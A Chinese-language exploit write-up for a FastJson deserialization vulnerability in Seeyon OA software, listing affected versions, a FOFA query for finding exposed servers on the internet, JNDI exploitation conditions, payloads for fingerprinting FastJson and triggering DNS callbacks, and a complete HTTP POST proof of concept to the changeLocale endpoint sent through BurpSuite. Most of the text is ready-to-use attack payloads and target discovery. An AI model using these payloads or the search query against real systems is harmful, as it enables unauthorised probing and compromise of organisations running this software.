0x01 影响范围
V7.1、V7.1SP1
V7.0、V7.0SP1、V7.0SP2、V7.0SP3
V6.1、V6.1SP1、V6.1SP2
V6.0、V6.0SP1
V5.6、V5.6SP1
0x02 漏洞搜索
搜索语法
FOFA:"seeyon" && after="2021-05-01"
0x03 漏洞检测
Jndi影响范围:
1、rmi的利用方式:适用jdk版本:JDK 6u132、JDK 7u122、JDK 8u113之前
2、ldap的利用方式:适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前
区分FastJson与Jackson:
1)不闭合花括号看报错信息方法
2)减少参数方法
{"name":"S", "age":21}//Fastjson 是不会报错
{"name":"S", "age":21,"xxx":123}// Jackson 语法相对比较严格,会报错
3)fastjson报错关键词:
com.alibaba.fastjson.JSONException , 触发方式如下
{"x":"
["x":1]
{"x":{"@type":"java.lang.AutoCloseable"
DNS探测方法:
注意:Content-Type: application/json
# 未报错poc
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}}
{"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}
# 报错,但仍有效
{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"x":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}
# 报错,且返回400,但仍有效
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0}
0x04 漏洞复现
1.使用dnslog验证漏洞, 打开http://www.dnslog.cn获取域名
漏洞POC
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
_json_params={"@type":"java.net.Inet4Address","val":"qn94mq.dnslog.cn"}
3.将上面的代码放到BurpSuite中,然后设置好对应的HOST和端口。
查看dnslog 成功回显, 说明存在漏洞
image.png